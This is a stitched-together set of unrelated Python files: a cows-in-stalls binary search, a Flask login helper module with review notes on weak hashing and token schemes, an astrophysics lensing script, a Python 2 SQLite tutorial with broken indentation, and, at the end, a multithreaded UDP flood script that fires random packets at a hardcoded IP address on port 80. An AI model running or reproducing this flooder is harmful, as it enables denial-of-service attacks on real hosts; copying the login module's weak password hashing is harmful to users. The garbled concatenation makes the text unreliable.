# Given N stalls and C cows, place the C cows in stalls so that the
# minimum distance between any two cows is as large as possible.
def check(c, positions, n, distance):
    """Return True if c cows fit in the sorted stall `positions` with every
    adjacent pair at least `distance` apart (greedy left-to-right placement)."""
    placed = 1
    prev = positions[0]
    for idx in range(1, n):
        # Skip stalls that are too close to the last cow placed.
        if positions[idx] - prev < distance:
            continue
        prev = positions[idx]
        placed += 1
        if placed == c:
            return True
    return False
if __name__ == "__main__":
    # Input: number of test cases, then per case "n c" followed by n stall
    # positions, one per line.
    for _ in range(int(input())):
        n, c = map(int, input().split())
        positions = sorted(int(input()) for _ in range(n))
        # Binary search the answer: the largest spacing for which the
        # greedy placement in check() still fits all c cows.
        lo, hi = 0, positions[n - 1] - positions[0]
        best = -1
        while lo <= hi:
            mid = lo + (hi - lo) // 2
            if check(c, positions, n, mid):
                best = mid
                lo = mid + 1
            else:
                hi = mid - 1
        print(best)
|
# -*- coding: utf-8 -*-
from functools import wraps
import random
import string
import hashlib
import json
import urllib
from flask import session, request, redirect
from models.orm import User
from models.project import project
from zp_web import get_db
__author__ = 'cloudbeer'
def rdm_code(size=8, chars=string.ascii_letters + string.digits + string.punctuation):
    """Return a random code of `size` characters drawn from `chars`.

    NOTE(review): `random` is not cryptographically secure; if these codes
    guard anything sensitive, prefer the `secrets` module / SystemRandom.
    """
    return ''.join(random.choice(chars) for _ in range(size))
def salt():
    """Return a fresh 16-character random password salt."""
    return rdm_code(size=16)
def challenge_code():
    """Return a 6-digit numeric one-time challenge code."""
    return rdm_code(size=6, chars=string.digits)
def hash_pwd(pwd, salt):
    """Return the hex SHA-256 digest of salt concatenated with pwd.

    NOTE(review): a single SHA-256 pass is weak for password storage;
    prefer an iterated KDF such as PBKDF2/bcrypt/scrypt.
    """
    return hashlib.sha256(salt + pwd).hexdigest()
def is_name(s):
    """Return True if s is a plausible name: non-empty, ASCII-only, not
    starting with a digit, and containing no spaces."""
    if not s:
        # Fix: the original indexed s[0] unconditionally, raising
        # IndexError on an empty string.
        return False
    is_ascii = all(ord(c) < 128 for c in s)
    is_ascii_first = not s[0].isdigit()
    is_contains_blank = ' ' not in s
    return is_ascii and is_ascii_first and is_contains_blank
def str2bool(v):
    """Interpret common truthy strings ("yes"/"true"/"t"/"1"),
    case-insensitively; everything else is False."""
    return v.lower() in {"yes", "true", "t", "1"}
def str2val(string, default=None):
    """Convert a string into a typed value.

    Tries, in order: the literals "True"/"False"/"None", then int, then
    float; falls back to returning the string unchanged.

    :param string: text to convert (note: this parameter shadows the stdlib
        ``string`` module imported at the top of the file)
    :param default: value returned when numeric parsing fails
    :return: bool/None/int/float, ``default``, or the original string
    """
    # Literal constants first: "True" -> True, "False" -> False, "None" -> None.
    for atom in (True, False, None):
        if str(atom) == string:
            return atom
    else:
        # for/else: runs only when no literal matched above.
        try:
            return int(string)
        except ValueError:
            # NOTE(review): when `default` is provided, an int-parse failure
            # returns `default` before float parsing is ever attempted, so
            # e.g. "3.5" with a default never yields 3.5 -- confirm intended.
            if default is not None:
                return default
            try:
                return float(string)
            except ValueError:
                if default is not None:
                    return default
                return string
class json_res(dict):
    """Dict-backed JSON response whose attributes proxy to keys.

    Missing attributes read as None; every attribute write lands in the
    underlying dict, so the whole object serialises with json.dumps.
    """
    def __init__(self, state=False, message=None, **kwargs):
        super(json_res, self).__init__(**kwargs)
        self.state = state
        if message is not None:
            self.message = message
    def __getattr__(self, name):
        # Only called for attributes not found normally; map to dict keys.
        return self[name] if name in self else None
    def __setattr__(self, name, value):
        self[name] = value
    def str(self):
        """Serialise this response to a JSON string."""
        return json.dumps(self)
def s_user():
    """Return the currently authenticated user, or None.

    Resolution order: the Flask session cache first, then a remember-me
    cookie pair ('email' + 'emailtoken'); a successful cookie match
    repopulates the session.

    :return: User ORM instance, or None when nobody is logged in
    """
    if 'user' in session:
        return session['user']
    elif 'email' in request.cookies and 'emailtoken' in request.cookies:
        email = request.cookies['email']
        emailtoken = request.cookies['emailtoken']
        if email is not None and emailtoken is not None:
            db = get_db()
            m_user = db.query(User).filter(User.email == email).first()
            # The cookie token must equal the salted hash of the email; a
            # match re-authenticates without a password.
            # NOTE(review): this token is derivable from the email plus the
            # stored salt alone -- verify this remember-me scheme is strong
            # enough for the application.
            if m_user is not None and hash_pwd(email, m_user.salt) == emailtoken:
                session['user'] = m_user
                return m_user
    return None
def s_project():
    """Return the project cached in the session, creating one on demand."""
    cached = session['project'] if 'project' in session else None
    if cached is not None:
        return cached
    m_project = project()
    session['project'] = m_project
    return m_project
def login_required_ajax(func):
    """Decorator for AJAX views: anonymous callers get a JSON error payload
    instead of a redirect."""
    @wraps(func)
    def warpper_ajax(*args, **kwargs):
        if s_user():
            return func(*args, **kwargs)
        return json_res(False, message='You must login first.').str()
    return warpper_ajax
def login_required(func):
    """Decorator for page views: anonymous users are redirected to the login
    page with a `back` parameter pointing at the originally requested path."""
    @wraps(func)
    def warpper_mormal(*args, **kwargs):
        if s_user():
            return func(*args, **kwargs)
        # Python 2 API: urllib.urlencode (urllib.parse.urlencode in Python 3).
        back = urllib.urlencode({'back': request.path})
        return redirect('/account/login/?' + back)
    return warpper_mormal
|
#!/usr/bin/env python
#Duncan Campbell
#January 29, 2015
#Yale University
#Calculate auto and cross correlation (SF and quenched) of stellar mass threshold samples
#for central quenching mocks
#load packages
from __future__ import print_function
import numpy as np
import h5py
import matplotlib.pyplot as plt
import custom_utilities as cu
import sys
from halotools_old.mock_observables.two_point_functions import Delta_Sigma
from astropy.io import ascii
from astropy.table import Table
def main():
    """Measure the galaxy-galaxy lensing signal Delta Sigma around mock
    galaxies in one stellar-mass bin, for all / quenched / star-forming
    samples, and write each profile to an ascii table.

    Usage: script.py [catalogue sm_bin_low sm_bin_high]
    """
    #process command-line arguments (catalogue name and stellar-mass bin)
    if len(sys.argv)>1:
        catalogue = sys.argv[1]
        sm_bin_low = float(sys.argv[2])
        sm_bin_high = float(sys.argv[3])
    else:
        catalogue = 'sm_9.5_s0.2_sfr_c-1.0_250'
        sm_bin_low = 10.0
        #fix: this was misspelled 'sm_bin_hgih', so running with no CLI
        #arguments raised NameError on the line below
        sm_bin_high = 10.5
    sm_bin = str(sm_bin_low)+'_'+str(sm_bin_high)

    #open galaxy mock catalogue
    filepath_mock = cu.get_output_path() + 'processed_data/campbell_mocks/'
    print('opening mock catalogue:', catalogue+'.hdf5')
    f = h5py.File(filepath_mock+catalogue+'.hdf5', 'r') #open catalogue file
    mock = f.get(catalogue)

    #open (down-sampled) dark matter particle data
    filepath_particles = cu.get_output_path() + 'processed_data/Multidark/Bolshoi/particle_catalogues/'
    part_catalogue = 'bolshoi_a1.0003_1e6_particles'
    f = h5py.File(filepath_particles+part_catalogue+'.hdf5', 'r') #open catalogue file
    particle_data = f.get(part_catalogue)
    particles = np.zeros((len(particle_data),3))
    particles[:,0] = particle_data['x']
    particles[:,1] = particle_data['y']
    particles[:,2] = particle_data['z']
    print("number of mater particles: {0}".format(len(particles)))

    #define star forming and quenched samples by a specific-SFR cut
    LHS = -11.0
    blue = (mock['SSFR']>LHS) #boolean mask of star-forming galaxies
    red = (mock['SSFR']<LHS) #boolean mask of quenched galaxies

    #define radial bins: log-spaced with an innermost edge at 0
    rbins = np.linspace(-1,np.log10(2),15)
    rbins = 10.0**rbins
    rbins = np.insert(rbins,0,0.0)
    rbin_centers = (rbins[:-1]+rbins[1:])/2.0
    period = [250.0,250.0,250.0] #periodic box size in Mpc/h

    def _lensing_profile(selection):
        #helper: Delta Sigma around the selected galaxies
        #list() so len() works on Python 3 as well (zip returns an iterator there)
        centers = list(zip(mock['x'][selection],mock['y'][selection],mock['z'][selection]))
        print("number of galaxies in selection: {0}".format(len(centers)))
        return Delta_Sigma(centers, particles, rbins, bounds=[-50.0,50.0],
                           normal=[0.0,0.0,1.0], period=period, N_threads=1)

    in_sm_bin = (mock['Mstar']>sm_bin_low) & (mock['Mstar']<sm_bin_high)
    #all galaxies in the stellar-mass bin
    delta_sigma_all = _lensing_profile(in_sm_bin)
    #quenched galaxies
    delta_sigma_red = _lensing_profile(red & in_sm_bin)
    #star forming galaxies
    delta_sigma_blue = _lensing_profile(blue & in_sm_bin)

    #convert particle counts to mass: each kept particle represents the mass
    #of the full simulation divided by the number retained in the sub-sample
    N_particles_tot = 2048.0**3.0
    N_particles_sub = len(particles)
    Mass_particles = 1.35*10.0**8.0 #Msol per simulation particle
    Mass_particle_sub = N_particles_tot/N_particles_sub * Mass_particles
    #units: Msol/Mpc^2
    #fix: the 'all' profile was previously written out unscaled while the
    #red/blue profiles were mass-converted; apply the same conversion to all
    delta_sigma_all = delta_sigma_all*Mass_particle_sub
    delta_sigma_blue = delta_sigma_blue*Mass_particle_sub
    delta_sigma_red = delta_sigma_red*Mass_particle_sub
    #now convert to Msol/pc^2
    pc2_per_Mpc2 = (10.0**6.0)**2.0
    delta_sigma_all = delta_sigma_all/pc2_per_Mpc2
    delta_sigma_blue = delta_sigma_blue/pc2_per_Mpc2
    delta_sigma_red = delta_sigma_red/pc2_per_Mpc2

    #write one table per sample: *_all, *_q (quenched), *_sf (star-forming)
    savepath = cu.get_output_path() + 'analysis/central_quenching/observables/'
    for tag, profile in (('all', delta_sigma_all),
                         ('q', delta_sigma_red),
                         ('sf', delta_sigma_blue)):
        data = Table([rbin_centers, profile], names=['r', 'DeltaSigma'])
        filename = catalogue+'_DeltaSigma_sm_'+tag+'_'+str(sm_bin)+'.dat'
        ascii.write(data, savepath+filename)

if __name__ == '__main__':
    main()
#!/usr/bin/env python
""" SQLite with Python - Managing relational SQLite databases """
__author__ = "Saul Moore sm5911@imperial.ac.uk"
__version__ = "0.0.1"
import sqlite3
conn = sqlite3.connect('../Data/test.db') # Create 'test.db'
# To exceute commands, create a 'cursor'
c = conn.cursor()
# Use the cursor to execute the queries
# Use the triple single quote to write queries on several lines
c.execute('''CREATE TABLE Test
(ID INTEGER PRIMARY KEY,
MyVal1 INTEGER,
MYVal2 TEXT)''')
# c.execute('''DROP TABLE test''') # Delete table
# Insert the records, note that because we set the primary key,
# it will auto-increment, therefore, set it to NULL
c.execute('''INSERT INTO Test VALUES
(NULL, 3, 'mickey')''')
c.execute('''INSERT INTO Test VALUES
(NULL, 4, 'mouse')''')
# When you 'commit', all the commands will be executed
conn.commit()
# Now we select the records (row data):
c.execute("SELECT * FROM TEST")
# Access the next record:
print c.fetchone()
print c.fetchone()
# Let's get all the records at once:
c.execute("SELECT * FROM TEST")
print c.fetchall()
# Insert many records at once, create a list of tuples:
manyrecs = [(5, 'goofy'),
(6, 'donald'),
(7, 'duck')]
# Now call 'executemany'
c.executemany('''INSERT INTO test
VALUES(NULL, ?, ?)''', manyrecs)
# and commit
conn.commit()
# Now let's fetch the records, we can use the query as an iterator!
for row in c.execute('SELECT * FROM test'):
print 'Val', row[1], 'Name', row[2]
# Close the connection before exiting
conn.close()
|
import threading
import sys
import os
import time
import socket
import random
import time
def attack():
a=3 #number of minutes
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
start = time.time()
#ip = input("IP Target : ")
#port = input("Port : ")
ip="107.180.95.144"
port=80
os.system("clear")
sent = 0
#change number to how many packets each thread should send.
x=True
while x:
sock.sendto(bytes, (ip,port))
sent = sent + 1
print("Thread "+threading.current_thread().name+"Sent %s packet to %s through port:%s"%(sent,ip,port))
end = time.time()
if(end - start)>a*60:
x=False
nooft=int(input("Enter number of threads"))
#mins=int(input("Enter how long the attack should be"))
mythreads=[]
for i in range(0,nooft):
t= threading.Thread(target=attack, name="t"+str(i))
mythreads.append(t)
t.start()
for i in range(0,nooft):
mythreads[i].join()
print("DONE") |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.